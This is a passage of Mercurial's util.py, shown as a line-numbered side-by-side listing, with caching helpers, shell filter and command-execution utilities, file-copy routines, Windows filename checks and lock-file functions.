1173 """Add a node to the circular linked list.
1182 """Add a node to the circular linked list.
1174
1183
1175 The new node is inserted before the head node.
1184 The new node is inserted before the head node.
1176 """
1185 """
1177 head = self._head
1186 head = self._head
1178 node = _lrucachenode()
1187 node = _lrucachenode()
1179 head.prev.next = node
1188 head.prev.next = node
1180 node.prev = head.prev
1189 node.prev = head.prev
1181 node.next = head
1190 node.next = head
1182 head.prev = node
1191 head.prev = node
1183 self._size += 1
1192 self._size += 1
1184 return node
1193 return node
1185
1194
1186 def lrucachefunc(func):
1195 def lrucachefunc(func):
1187 '''cache most recent results of function calls'''
1196 '''cache most recent results of function calls'''
1188 cache = {}
1197 cache = {}
1189 order = collections.deque()
1198 order = collections.deque()
1190 if func.__code__.co_argcount == 1:
1199 if func.__code__.co_argcount == 1:
1191 def f(arg):
1200 def f(arg):
1192 if arg not in cache:
1201 if arg not in cache:
1193 if len(cache) > 20:
1202 if len(cache) > 20:
1194 del cache[order.popleft()]
1203 del cache[order.popleft()]
1195 cache[arg] = func(arg)
1204 cache[arg] = func(arg)
1196 else:
1205 else:
1197 order.remove(arg)
1206 order.remove(arg)
1198 order.append(arg)
1207 order.append(arg)
1199 return cache[arg]
1208 return cache[arg]
1200 else:
1209 else:
1201 def f(*args):
1210 def f(*args):
1202 if args not in cache:
1211 if args not in cache:
1203 if len(cache) > 20:
1212 if len(cache) > 20:
1204 del cache[order.popleft()]
1213 del cache[order.popleft()]
1205 cache[args] = func(*args)
1214 cache[args] = func(*args)
1206 else:
1215 else:
1207 order.remove(args)
1216 order.remove(args)
1208 order.append(args)
1217 order.append(args)
1209 return cache[args]
1218 return cache[args]
1210
1219
1211 return f
1220 return f
1212
1221
1213 class propertycache(object):
1222 class propertycache(object):
1214 def __init__(self, func):
1223 def __init__(self, func):
1215 self.func = func
1224 self.func = func
1216 self.name = func.__name__
1225 self.name = func.__name__
1217 def __get__(self, obj, type=None):
1226 def __get__(self, obj, type=None):
1218 result = self.func(obj)
1227 result = self.func(obj)
1219 self.cachevalue(obj, result)
1228 self.cachevalue(obj, result)
1220 return result
1229 return result
1221
1230
1222 def cachevalue(self, obj, value):
1231 def cachevalue(self, obj, value):
1223 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
1232 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
1224 obj.__dict__[self.name] = value
1233 obj.__dict__[self.name] = value
1225
1234
1226 def clearcachedproperty(obj, prop):
1235 def clearcachedproperty(obj, prop):
1227 '''clear a cached property value, if one has been set'''
1236 '''clear a cached property value, if one has been set'''
1228 if prop in obj.__dict__:
1237 if prop in obj.__dict__:
1229 del obj.__dict__[prop]
1238 del obj.__dict__[prop]
1230
1239
1231 def pipefilter(s, cmd):
1240 def pipefilter(s, cmd):
1232 '''filter string S through command CMD, returning its output'''
1241 '''filter string S through command CMD, returning its output'''
1233 p = subprocess.Popen(cmd, shell=True, close_fds=closefds,
1242 p = subprocess.Popen(cmd, shell=True, close_fds=closefds,
1234 stdin=subprocess.PIPE, stdout=subprocess.PIPE)
1243 stdin=subprocess.PIPE, stdout=subprocess.PIPE)
1235 pout, perr = p.communicate(s)
1244 pout, perr = p.communicate(s)
1236 return pout
1245 return pout
1237
1246
1238 def tempfilter(s, cmd):
1247 def tempfilter(s, cmd):
1239 '''filter string S through a pair of temporary files with CMD.
1248 '''filter string S through a pair of temporary files with CMD.
1240 CMD is used as a template to create the real command to be run,
1249 CMD is used as a template to create the real command to be run,
1241 with the strings INFILE and OUTFILE replaced by the real names of
1250 with the strings INFILE and OUTFILE replaced by the real names of
1242 the temporary files generated.'''
1251 the temporary files generated.'''
1243 inname, outname = None, None
1252 inname, outname = None, None
1244 try:
1253 try:
1245 infd, inname = tempfile.mkstemp(prefix='hg-filter-in-')
1254 infd, inname = tempfile.mkstemp(prefix='hg-filter-in-')
1246 fp = os.fdopen(infd, pycompat.sysstr('wb'))
1255 fp = os.fdopen(infd, pycompat.sysstr('wb'))
1247 fp.write(s)
1256 fp.write(s)
1248 fp.close()
1257 fp.close()
1249 outfd, outname = tempfile.mkstemp(prefix='hg-filter-out-')
1258 outfd, outname = tempfile.mkstemp(prefix='hg-filter-out-')
1250 os.close(outfd)
1259 os.close(outfd)
1251 cmd = cmd.replace('INFILE', inname)
1260 cmd = cmd.replace('INFILE', inname)
1252 cmd = cmd.replace('OUTFILE', outname)
1261 cmd = cmd.replace('OUTFILE', outname)
1253 code = os.system(cmd)
1262 code = os.system(cmd)
1254 if pycompat.sysplatform == 'OpenVMS' and code & 1:
1263 if pycompat.sysplatform == 'OpenVMS' and code & 1:
1255 code = 0
1264 code = 0
1256 if code:
1265 if code:
1257 raise Abort(_("command '%s' failed: %s") %
1266 raise Abort(_("command '%s' failed: %s") %
1258 (cmd, explainexit(code)))
1267 (cmd, explainexit(code)))
1259 return readfile(outname)
1268 return readfile(outname)
1260 finally:
1269 finally:
1261 try:
1270 try:
1262 if inname:
1271 if inname:
1263 os.unlink(inname)
1272 os.unlink(inname)
1264 except OSError:
1273 except OSError:
1265 pass
1274 pass
1266 try:
1275 try:
1267 if outname:
1276 if outname:
1268 os.unlink(outname)
1277 os.unlink(outname)
1269 except OSError:
1278 except OSError:
1270 pass
1279 pass
1271
1280
1272 filtertable = {
1281 filtertable = {
1273 'tempfile:': tempfilter,
1282 'tempfile:': tempfilter,
1274 'pipe:': pipefilter,
1283 'pipe:': pipefilter,
1275 }
1284 }
1276
1285
1277 def filter(s, cmd):
1286 def filter(s, cmd):
1278 "filter a string through a command that transforms its input to its output"
1287 "filter a string through a command that transforms its input to its output"
1279 for name, fn in filtertable.iteritems():
1288 for name, fn in filtertable.iteritems():
1280 if cmd.startswith(name):
1289 if cmd.startswith(name):
1281 return fn(s, cmd[len(name):].lstrip())
1290 return fn(s, cmd[len(name):].lstrip())
1282 return pipefilter(s, cmd)
1291 return pipefilter(s, cmd)
1283
1292
1284 def binary(s):
1293 def binary(s):
1285 """return true if a string is binary data"""
1294 """return true if a string is binary data"""
1286 return bool(s and '\0' in s)
1295 return bool(s and '\0' in s)
1287
1296
1288 def increasingchunks(source, min=1024, max=65536):
1297 def increasingchunks(source, min=1024, max=65536):
1289 '''return no less than min bytes per chunk while data remains,
1298 '''return no less than min bytes per chunk while data remains,
1290 doubling min after each chunk until it reaches max'''
1299 doubling min after each chunk until it reaches max'''
1291 def log2(x):
1300 def log2(x):
1292 if not x:
1301 if not x:
1293 return 0
1302 return 0
1294 i = 0
1303 i = 0
1295 while x:
1304 while x:
1296 x >>= 1
1305 x >>= 1
1297 i += 1
1306 i += 1
1298 return i - 1
1307 return i - 1
1299
1308
1300 buf = []
1309 buf = []
1301 blen = 0
1310 blen = 0
1302 for chunk in source:
1311 for chunk in source:
1303 buf.append(chunk)
1312 buf.append(chunk)
1304 blen += len(chunk)
1313 blen += len(chunk)
1305 if blen >= min:
1314 if blen >= min:
1306 if min < max:
1315 if min < max:
1307 min = min << 1
1316 min = min << 1
1308 nmin = 1 << log2(blen)
1317 nmin = 1 << log2(blen)
1309 if nmin > min:
1318 if nmin > min:
1310 min = nmin
1319 min = nmin
1311 if min > max:
1320 if min > max:
1312 min = max
1321 min = max
1313 yield ''.join(buf)
1322 yield ''.join(buf)
1314 blen = 0
1323 blen = 0
1315 buf = []
1324 buf = []
1316 if buf:
1325 if buf:
1317 yield ''.join(buf)
1326 yield ''.join(buf)
1318
1327
1319 Abort = error.Abort
1328 Abort = error.Abort
1320
1329
1321 def always(fn):
1330 def always(fn):
1322 return True
1331 return True
1323
1332
1324 def never(fn):
1333 def never(fn):
1325 return False
1334 return False
1326
1335
1327 def nogc(func):
1336 def nogc(func):
1328 """disable garbage collector
1337 """disable garbage collector
1329
1338
1330 Python's garbage collector triggers a GC each time a certain number of
1339 Python's garbage collector triggers a GC each time a certain number of
1331 container objects (the number being defined by gc.get_threshold()) are
1340 container objects (the number being defined by gc.get_threshold()) are
1332 allocated even when marked not to be tracked by the collector. Tracking has
1341 allocated even when marked not to be tracked by the collector. Tracking has
1333 no effect on when GCs are triggered, only on what objects the GC looks
1342 no effect on when GCs are triggered, only on what objects the GC looks
1334 into. As a workaround, disable GC while building complex (huge)
1343 into. As a workaround, disable GC while building complex (huge)
1335 containers.
1344 containers.
1336
1345
1337 This garbage collector issue have been fixed in 2.7. But it still affect
1346 This garbage collector issue have been fixed in 2.7. But it still affect
1338 CPython's performance.
1347 CPython's performance.
1339 """
1348 """
1340 def wrapper(*args, **kwargs):
1349 def wrapper(*args, **kwargs):
1341 gcenabled = gc.isenabled()
1350 gcenabled = gc.isenabled()
1342 gc.disable()
1351 gc.disable()
1343 try:
1352 try:
1344 return func(*args, **kwargs)
1353 return func(*args, **kwargs)
1345 finally:
1354 finally:
1346 if gcenabled:
1355 if gcenabled:
1347 gc.enable()
1356 gc.enable()
1348 return wrapper
1357 return wrapper
1349
1358
1350 if pycompat.ispypy:
1359 if pycompat.ispypy:
1351 # PyPy runs slower with gc disabled
1360 # PyPy runs slower with gc disabled
1352 nogc = lambda x: x
1361 nogc = lambda x: x
1353
1362
1354 def pathto(root, n1, n2):
1363 def pathto(root, n1, n2):
1355 '''return the relative path from one place to another.
1364 '''return the relative path from one place to another.
1356 root should use os.sep to separate directories
1365 root should use os.sep to separate directories
1357 n1 should use os.sep to separate directories
1366 n1 should use os.sep to separate directories
1358 n2 should use "/" to separate directories
1367 n2 should use "/" to separate directories
1359 returns an os.sep-separated path.
1368 returns an os.sep-separated path.
1360
1369
1361 If n1 is a relative path, it's assumed it's
1370 If n1 is a relative path, it's assumed it's
1362 relative to root.
1371 relative to root.
1363 n2 should always be relative to root.
1372 n2 should always be relative to root.
1364 '''
1373 '''
1365 if not n1:
1374 if not n1:
1366 return localpath(n2)
1375 return localpath(n2)
1367 if os.path.isabs(n1):
1376 if os.path.isabs(n1):
1368 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1377 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1369 return os.path.join(root, localpath(n2))
1378 return os.path.join(root, localpath(n2))
1370 n2 = '/'.join((pconvert(root), n2))
1379 n2 = '/'.join((pconvert(root), n2))
1371 a, b = splitpath(n1), n2.split('/')
1380 a, b = splitpath(n1), n2.split('/')
1372 a.reverse()
1381 a.reverse()
1373 b.reverse()
1382 b.reverse()
1374 while a and b and a[-1] == b[-1]:
1383 while a and b and a[-1] == b[-1]:
1375 a.pop()
1384 a.pop()
1376 b.pop()
1385 b.pop()
1377 b.reverse()
1386 b.reverse()
1378 return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1387 return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1379
1388
1380 def mainfrozen():
1389 def mainfrozen():
1381 """return True if we are a frozen executable.
1390 """return True if we are a frozen executable.
1382
1391
1383 The code supports py2exe (most common, Windows only) and tools/freeze
1392 The code supports py2exe (most common, Windows only) and tools/freeze
1384 (portable, not much used).
1393 (portable, not much used).
1385 """
1394 """
1386 return (safehasattr(sys, "frozen") or # new py2exe
1395 return (safehasattr(sys, "frozen") or # new py2exe
1387 safehasattr(sys, "importers") or # old py2exe
1396 safehasattr(sys, "importers") or # old py2exe
1388 imp.is_frozen(u"__main__")) # tools/freeze
1397 imp.is_frozen(u"__main__")) # tools/freeze
1389
1398
1390 # the location of data files matching the source code
1399 # the location of data files matching the source code
1391 if mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
1400 if mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
1392 # executable version (py2exe) doesn't support __file__
1401 # executable version (py2exe) doesn't support __file__
1393 datapath = os.path.dirname(pycompat.sysexecutable)
1402 datapath = os.path.dirname(pycompat.sysexecutable)
1394 else:
1403 else:
1395 datapath = os.path.dirname(pycompat.fsencode(__file__))
1404 datapath = os.path.dirname(pycompat.fsencode(__file__))
1396
1405
1397 i18n.setdatapath(datapath)
1406 i18n.setdatapath(datapath)
1398
1407
1399 _hgexecutable = None
1408 _hgexecutable = None
1400
1409
1401 def hgexecutable():
1410 def hgexecutable():
1402 """return location of the 'hg' executable.
1411 """return location of the 'hg' executable.
1403
1412
1404 Defaults to $HG or 'hg' in the search path.
1413 Defaults to $HG or 'hg' in the search path.
1405 """
1414 """
1406 if _hgexecutable is None:
1415 if _hgexecutable is None:
1407 hg = encoding.environ.get('HG')
1416 hg = encoding.environ.get('HG')
1408 mainmod = sys.modules[pycompat.sysstr('__main__')]
1417 mainmod = sys.modules[pycompat.sysstr('__main__')]
1409 if hg:
1418 if hg:
1410 _sethgexecutable(hg)
1419 _sethgexecutable(hg)
1411 elif mainfrozen():
1420 elif mainfrozen():
1412 if getattr(sys, 'frozen', None) == 'macosx_app':
1421 if getattr(sys, 'frozen', None) == 'macosx_app':
1413 # Env variable set by py2app
1422 # Env variable set by py2app
1414 _sethgexecutable(encoding.environ['EXECUTABLEPATH'])
1423 _sethgexecutable(encoding.environ['EXECUTABLEPATH'])
1415 else:
1424 else:
1416 _sethgexecutable(pycompat.sysexecutable)
1425 _sethgexecutable(pycompat.sysexecutable)
1417 elif (os.path.basename(
1426 elif (os.path.basename(
1418 pycompat.fsencode(getattr(mainmod, '__file__', ''))) == 'hg'):
1427 pycompat.fsencode(getattr(mainmod, '__file__', ''))) == 'hg'):
1419 _sethgexecutable(pycompat.fsencode(mainmod.__file__))
1428 _sethgexecutable(pycompat.fsencode(mainmod.__file__))
1420 else:
1429 else:
1421 exe = findexe('hg') or os.path.basename(sys.argv[0])
1430 exe = findexe('hg') or os.path.basename(sys.argv[0])
1422 _sethgexecutable(exe)
1431 _sethgexecutable(exe)
1423 return _hgexecutable
1432 return _hgexecutable
1424
1433
1425 def _sethgexecutable(path):
1434 def _sethgexecutable(path):
1426 """set location of the 'hg' executable"""
1435 """set location of the 'hg' executable"""
1427 global _hgexecutable
1436 global _hgexecutable
1428 _hgexecutable = path
1437 _hgexecutable = path
1429
1438
1430 def _isstdout(f):
1439 def _isstdout(f):
1431 fileno = getattr(f, 'fileno', None)
1440 fileno = getattr(f, 'fileno', None)
1432 try:
1441 try:
1433 return fileno and fileno() == sys.__stdout__.fileno()
1442 return fileno and fileno() == sys.__stdout__.fileno()
1434 except io.UnsupportedOperation:
1443 except io.UnsupportedOperation:
1435 return False # fileno() raised UnsupportedOperation
1444 return False # fileno() raised UnsupportedOperation
1436
1445
1437 def shellenviron(environ=None):
1446 def shellenviron(environ=None):
1438 """return environ with optional override, useful for shelling out"""
1447 """return environ with optional override, useful for shelling out"""
1439 def py2shell(val):
1448 def py2shell(val):
1440 'convert python object into string that is useful to shell'
1449 'convert python object into string that is useful to shell'
1441 if val is None or val is False:
1450 if val is None or val is False:
1442 return '0'
1451 return '0'
1443 if val is True:
1452 if val is True:
1444 return '1'
1453 return '1'
1445 return pycompat.bytestr(val)
1454 return pycompat.bytestr(val)
1446 env = dict(encoding.environ)
1455 env = dict(encoding.environ)
1447 if environ:
1456 if environ:
1448 env.update((k, py2shell(v)) for k, v in environ.iteritems())
1457 env.update((k, py2shell(v)) for k, v in environ.iteritems())
1449 env['HG'] = hgexecutable()
1458 env['HG'] = hgexecutable()
1450 return env
1459 return env
1451
1460
1452 def system(cmd, environ=None, cwd=None, out=None):
1461 def system(cmd, environ=None, cwd=None, out=None):
1453 '''enhanced shell command execution.
1462 '''enhanced shell command execution.
1454 run with environment maybe modified, maybe in different dir.
1463 run with environment maybe modified, maybe in different dir.
1455
1464
1456 if out is specified, it is assumed to be a file-like object that has a
1465 if out is specified, it is assumed to be a file-like object that has a
1457 write() method. stdout and stderr will be redirected to out.'''
1466 write() method. stdout and stderr will be redirected to out.'''
1458 try:
1467 try:
1459 stdout.flush()
1468 stdout.flush()
1460 except Exception:
1469 except Exception:
1461 pass
1470 pass
1462 cmd = quotecommand(cmd)
1471 cmd = quotecommand(cmd)
1463 env = shellenviron(environ)
1472 env = shellenviron(environ)
1464 if out is None or _isstdout(out):
1473 if out is None or _isstdout(out):
1465 rc = subprocess.call(cmd, shell=True, close_fds=closefds,
1474 rc = subprocess.call(cmd, shell=True, close_fds=closefds,
1466 env=env, cwd=cwd)
1475 env=env, cwd=cwd)
1467 else:
1476 else:
1468 proc = subprocess.Popen(cmd, shell=True, close_fds=closefds,
1477 proc = subprocess.Popen(cmd, shell=True, close_fds=closefds,
1469 env=env, cwd=cwd, stdout=subprocess.PIPE,
1478 env=env, cwd=cwd, stdout=subprocess.PIPE,
1470 stderr=subprocess.STDOUT)
1479 stderr=subprocess.STDOUT)
1471 for line in iter(proc.stdout.readline, ''):
1480 for line in iter(proc.stdout.readline, ''):
1472 out.write(line)
1481 out.write(line)
1473 proc.wait()
1482 proc.wait()
1474 rc = proc.returncode
1483 rc = proc.returncode
1475 if pycompat.sysplatform == 'OpenVMS' and rc & 1:
1484 if pycompat.sysplatform == 'OpenVMS' and rc & 1:
1476 rc = 0
1485 rc = 0
1477 return rc
1486 return rc
1478
1487
1479 def checksignature(func):
1488 def checksignature(func):
1480 '''wrap a function with code to check for calling errors'''
1489 '''wrap a function with code to check for calling errors'''
1481 def check(*args, **kwargs):
1490 def check(*args, **kwargs):
1482 try:
1491 try:
1483 return func(*args, **kwargs)
1492 return func(*args, **kwargs)
1484 except TypeError:
1493 except TypeError:
1485 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1494 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1486 raise error.SignatureError
1495 raise error.SignatureError
1487 raise
1496 raise
1488
1497
1489 return check
1498 return check
1490
1499
1491 # a whilelist of known filesystems where hardlink works reliably
1500 # a whilelist of known filesystems where hardlink works reliably
1492 _hardlinkfswhitelist = {
1501 _hardlinkfswhitelist = {
1493 'btrfs',
1502 'btrfs',
1494 'ext2',
1503 'ext2',
1495 'ext3',
1504 'ext3',
1496 'ext4',
1505 'ext4',
1497 'hfs',
1506 'hfs',
1498 'jfs',
1507 'jfs',
1499 'NTFS',
1508 'NTFS',
1500 'reiserfs',
1509 'reiserfs',
1501 'tmpfs',
1510 'tmpfs',
1502 'ufs',
1511 'ufs',
1503 'xfs',
1512 'xfs',
1504 'zfs',
1513 'zfs',
1505 }
1514 }
1506
1515
1507 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1516 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1508 '''copy a file, preserving mode and optionally other stat info like
1517 '''copy a file, preserving mode and optionally other stat info like
1509 atime/mtime
1518 atime/mtime
1510
1519
1511 checkambig argument is used with filestat, and is useful only if
1520 checkambig argument is used with filestat, and is useful only if
1512 destination file is guarded by any lock (e.g. repo.lock or
1521 destination file is guarded by any lock (e.g. repo.lock or
1513 repo.wlock).
1522 repo.wlock).
1514
1523
1515 copystat and checkambig should be exclusive.
1524 copystat and checkambig should be exclusive.
1516 '''
1525 '''
1517 assert not (copystat and checkambig)
1526 assert not (copystat and checkambig)
1518 oldstat = None
1527 oldstat = None
1519 if os.path.lexists(dest):
1528 if os.path.lexists(dest):
1520 if checkambig:
1529 if checkambig:
1521 oldstat = checkambig and filestat.frompath(dest)
1530 oldstat = checkambig and filestat.frompath(dest)
1522 unlink(dest)
1531 unlink(dest)
1523 if hardlink:
1532 if hardlink:
1524 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1533 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1525 # unless we are confident that dest is on a whitelisted filesystem.
1534 # unless we are confident that dest is on a whitelisted filesystem.
1526 try:
1535 try:
1527 fstype = getfstype(os.path.dirname(dest))
1536 fstype = getfstype(os.path.dirname(dest))
1528 except OSError:
1537 except OSError:
1529 fstype = None
1538 fstype = None
1530 if fstype not in _hardlinkfswhitelist:
1539 if fstype not in _hardlinkfswhitelist:
1531 hardlink = False
1540 hardlink = False
1532 if hardlink:
1541 if hardlink:
1533 try:
1542 try:
1534 oslink(src, dest)
1543 oslink(src, dest)
1535 return
1544 return
1536 except (IOError, OSError):
1545 except (IOError, OSError):
1537 pass # fall back to normal copy
1546 pass # fall back to normal copy
1538 if os.path.islink(src):
1547 if os.path.islink(src):
1539 os.symlink(os.readlink(src), dest)
1548 os.symlink(os.readlink(src), dest)
1540 # copytime is ignored for symlinks, but in general copytime isn't needed
1549 # copytime is ignored for symlinks, but in general copytime isn't needed
1541 # for them anyway
1550 # for them anyway
1542 else:
1551 else:
1543 try:
1552 try:
1544 shutil.copyfile(src, dest)
1553 shutil.copyfile(src, dest)
1545 if copystat:
1554 if copystat:
1546 # copystat also copies mode
1555 # copystat also copies mode
1547 shutil.copystat(src, dest)
1556 shutil.copystat(src, dest)
1548 else:
1557 else:
1549 shutil.copymode(src, dest)
1558 shutil.copymode(src, dest)
1550 if oldstat and oldstat.stat:
1559 if oldstat and oldstat.stat:
1551 newstat = filestat.frompath(dest)
1560 newstat = filestat.frompath(dest)
1552 if newstat.isambig(oldstat):
1561 if newstat.isambig(oldstat):
1553 # stat of copied file is ambiguous to original one
1562 # stat of copied file is ambiguous to original one
1554 advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
1563 advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
1555 os.utime(dest, (advanced, advanced))
1564 os.utime(dest, (advanced, advanced))
1556 except shutil.Error as inst:
1565 except shutil.Error as inst:
1557 raise Abort(str(inst))
1566 raise Abort(str(inst))
1558
1567
1559 def copyfiles(src, dst, hardlink=None, progress=lambda t, pos: None):
1568 def copyfiles(src, dst, hardlink=None, progress=lambda t, pos: None):
1560 """Copy a directory tree using hardlinks if possible."""
1569 """Copy a directory tree using hardlinks if possible."""
1561 num = 0
1570 num = 0
1562
1571
1563 gettopic = lambda: hardlink and _('linking') or _('copying')
1572 gettopic = lambda: hardlink and _('linking') or _('copying')
1564
1573
1565 if os.path.isdir(src):
1574 if os.path.isdir(src):
1566 if hardlink is None:
1575 if hardlink is None:
1567 hardlink = (os.stat(src).st_dev ==
1576 hardlink = (os.stat(src).st_dev ==
1568 os.stat(os.path.dirname(dst)).st_dev)
1577 os.stat(os.path.dirname(dst)).st_dev)
1569 topic = gettopic()
1578 topic = gettopic()
1570 os.mkdir(dst)
1579 os.mkdir(dst)
1571 for name, kind in listdir(src):
1580 for name, kind in listdir(src):
1572 srcname = os.path.join(src, name)
1581 srcname = os.path.join(src, name)
1573 dstname = os.path.join(dst, name)
1582 dstname = os.path.join(dst, name)
1574 def nprog(t, pos):
1583 def nprog(t, pos):
1575 if pos is not None:
1584 if pos is not None:
1576 return progress(t, pos + num)
1585 return progress(t, pos + num)
1577 hardlink, n = copyfiles(srcname, dstname, hardlink, progress=nprog)
1586 hardlink, n = copyfiles(srcname, dstname, hardlink, progress=nprog)
1578 num += n
1587 num += n
1579 else:
1588 else:
1580 if hardlink is None:
1589 if hardlink is None:
1581 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
1590 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
1582 os.stat(os.path.dirname(dst)).st_dev)
1591 os.stat(os.path.dirname(dst)).st_dev)
1583 topic = gettopic()
1592 topic = gettopic()
1584
1593
1585 if hardlink:
1594 if hardlink:
1586 try:
1595 try:
1587 oslink(src, dst)
1596 oslink(src, dst)
1588 except (IOError, OSError):
1597 except (IOError, OSError):
1589 hardlink = False
1598 hardlink = False
1590 shutil.copy(src, dst)
1599 shutil.copy(src, dst)
1591 else:
1600 else:
1592 shutil.copy(src, dst)
1601 shutil.copy(src, dst)
1593 num += 1
1602 num += 1
1594 progress(topic, num)
1603 progress(topic, num)
1595 progress(topic, None)
1604 progress(topic, None)
1596
1605
1597 return hardlink, num
1606 return hardlink, num
1598
1607
1599 _winreservednames = {
1608 _winreservednames = {
1600 'con', 'prn', 'aux', 'nul',
1609 'con', 'prn', 'aux', 'nul',
1601 'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
1610 'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
1602 'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
1611 'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
1603 }
1612 }
1604 _winreservedchars = ':*?"<>|'
1613 _winreservedchars = ':*?"<>|'
1605 def checkwinfilename(path):
1614 def checkwinfilename(path):
1606 r'''Check that the base-relative path is a valid filename on Windows.
1615 r'''Check that the base-relative path is a valid filename on Windows.
1607 Returns None if the path is ok, or a UI string describing the problem.
1616 Returns None if the path is ok, or a UI string describing the problem.
1608
1617
1609 >>> checkwinfilename(b"just/a/normal/path")
1618 >>> checkwinfilename(b"just/a/normal/path")
1610 >>> checkwinfilename(b"foo/bar/con.xml")
1619 >>> checkwinfilename(b"foo/bar/con.xml")
1611 "filename contains 'con', which is reserved on Windows"
1620 "filename contains 'con', which is reserved on Windows"
1612 >>> checkwinfilename(b"foo/con.xml/bar")
1621 >>> checkwinfilename(b"foo/con.xml/bar")
1613 "filename contains 'con', which is reserved on Windows"
1622 "filename contains 'con', which is reserved on Windows"
1614 >>> checkwinfilename(b"foo/bar/xml.con")
1623 >>> checkwinfilename(b"foo/bar/xml.con")
1615 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
1624 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
1616 "filename contains 'AUX', which is reserved on Windows"
1625 "filename contains 'AUX', which is reserved on Windows"
1617 >>> checkwinfilename(b"foo/bar/bla:.txt")
1626 >>> checkwinfilename(b"foo/bar/bla:.txt")
1618 "filename contains ':', which is reserved on Windows"
1627 "filename contains ':', which is reserved on Windows"
1619 >>> checkwinfilename(b"foo/bar/b\07la.txt")
1628 >>> checkwinfilename(b"foo/bar/b\07la.txt")
1620 "filename contains '\\x07', which is invalid on Windows"
1629 "filename contains '\\x07', which is invalid on Windows"
1621 >>> checkwinfilename(b"foo/bar/bla ")
1630 >>> checkwinfilename(b"foo/bar/bla ")
1622 "filename ends with ' ', which is not allowed on Windows"
1631 "filename ends with ' ', which is not allowed on Windows"
1623 >>> checkwinfilename(b"../bar")
1632 >>> checkwinfilename(b"../bar")
1624 >>> checkwinfilename(b"foo\\")
1633 >>> checkwinfilename(b"foo\\")
1625 "filename ends with '\\', which is invalid on Windows"
1634 "filename ends with '\\', which is invalid on Windows"
1626 >>> checkwinfilename(b"foo\\/bar")
1635 >>> checkwinfilename(b"foo\\/bar")
1627 "directory name ends with '\\', which is invalid on Windows"
1636 "directory name ends with '\\', which is invalid on Windows"
1628 '''
1637 '''
1629 if path.endswith('\\'):
1638 if path.endswith('\\'):
1630 return _("filename ends with '\\', which is invalid on Windows")
1639 return _("filename ends with '\\', which is invalid on Windows")
1631 if '\\/' in path:
1640 if '\\/' in path:
1632 return _("directory name ends with '\\', which is invalid on Windows")
1641 return _("directory name ends with '\\', which is invalid on Windows")
1633 for n in path.replace('\\', '/').split('/'):
1642 for n in path.replace('\\', '/').split('/'):
1634 if not n:
1643 if not n:
1635 continue
1644 continue
1636 for c in _filenamebytestr(n):
1645 for c in _filenamebytestr(n):
1637 if c in _winreservedchars:
1646 if c in _winreservedchars:
1638 return _("filename contains '%s', which is reserved "
1647 return _("filename contains '%s', which is reserved "
1639 "on Windows") % c
1648 "on Windows") % c
1640 if ord(c) <= 31:
1649 if ord(c) <= 31:
1641 return _("filename contains '%s', which is invalid "
1650 return _("filename contains '%s', which is invalid "
1642 "on Windows") % escapestr(c)
1651 "on Windows") % escapestr(c)
1643 base = n.split('.')[0]
1652 base = n.split('.')[0]
1644 if base and base.lower() in _winreservednames:
1653 if base and base.lower() in _winreservednames:
1645 return _("filename contains '%s', which is reserved "
1654 return _("filename contains '%s', which is reserved "
1646 "on Windows") % base
1655 "on Windows") % base
1647 t = n[-1:]
1656 t = n[-1:]
1648 if t in '. ' and n not in '..':
1657 if t in '. ' and n not in '..':
1649 return _("filename ends with '%s', which is not allowed "
1658 return _("filename ends with '%s', which is not allowed "
1650 "on Windows") % t
1659 "on Windows") % t
1651
1660
1652 if pycompat.iswindows:
1661 if pycompat.iswindows:
1653 checkosfilename = checkwinfilename
1662 checkosfilename = checkwinfilename
1654 timer = time.clock
1663 timer = time.clock
1655 else:
1664 else:
1656 checkosfilename = platform.checkosfilename
1665 checkosfilename = platform.checkosfilename
1657 timer = time.time
1666 timer = time.time
1658
1667
1659 if safehasattr(time, "perf_counter"):
1668 if safehasattr(time, "perf_counter"):
1660 timer = time.perf_counter
1669 timer = time.perf_counter
1661
1670
1662 def makelock(info, pathname):
1671 def makelock(info, pathname):
1663 try:
1672 try:
1664 return os.symlink(info, pathname)
1673 return os.symlink(info, pathname)
1665 except OSError as why:
1674 except OSError as why:
1666 if why.errno == errno.EEXIST:
1675 if why.errno == errno.EEXIST:
1667 raise
1676 raise
1668 except AttributeError: # no symlink in os
1677 except AttributeError: # no symlink in os
1669 pass
1678 pass
1670
1679
1671 ld = os.open(pathname, os.O_CREAT | os.O_WRONLY | os.O_EXCL)
1680 ld = os.open(pathname, os.O_CREAT | os.O_WRONLY | os.O_EXCL)
1672 os.write(ld, info)
1681 os.write(ld, info)
1673 os.close(ld)
1682 os.close(ld)
1674
1683
1675 def readlock(pathname):
1684 def readlock(pathname):
1676 try:
1685 try:
1677 return os.readlink(pathname)
1686 return os.readlink(pathname)
1678 except OSError as why:
1687 except OSError as why:
1679 if why.errno not in (errno.EINVAL, errno.ENOSYS):
1688 if why.errno not in (errno.EINVAL, errno.ENOSYS):
1680 raise
1689 raise
1681 except AttributeError: # no symlink in os
1690 except AttributeError: # no symlink in os
1682 pass
1691 pass
1683 fp = posixfile(pathname)
1692 fp = posixfile(pathname)
1684 r = fp.read()
1693 r = fp.read()
1685 fp.close()
1694 fp.close()
1686 return r
